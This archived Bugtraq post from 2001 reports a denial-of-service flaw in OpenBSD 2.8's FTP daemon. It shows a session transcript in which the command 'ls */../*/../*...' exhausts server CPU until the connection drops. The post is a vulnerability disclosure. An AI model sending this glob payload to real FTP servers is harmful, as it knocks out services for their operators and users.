[19758] in bugtraq
Multiple vendors FTP denial of service
daemon@ATHENA.MIT.EDU (Peter Timothey Hessler)
Wed Mar 21 17:33:20 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3AB78786.1C06FC5E@paychex.com>
Date: Tue, 20 Mar 2001 08:38:31 -0800
Reply-To: phessler@paychex.com
From: Peter Timothey Hessler <phessler@paychex.com>
To: BUGTRAQ@SECURITYFOCUS.COM
OpenBSD 2.8 (from cd) goes to 100% CPU. Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc shell is bash relevant system info: Pentium 133
32Meg ram, 4Gig hard drive 100baseT nic.
Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>
After ftpd is using >90% CPU, I can still log-in and work like normal,
with a small noticeable delay.
--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500
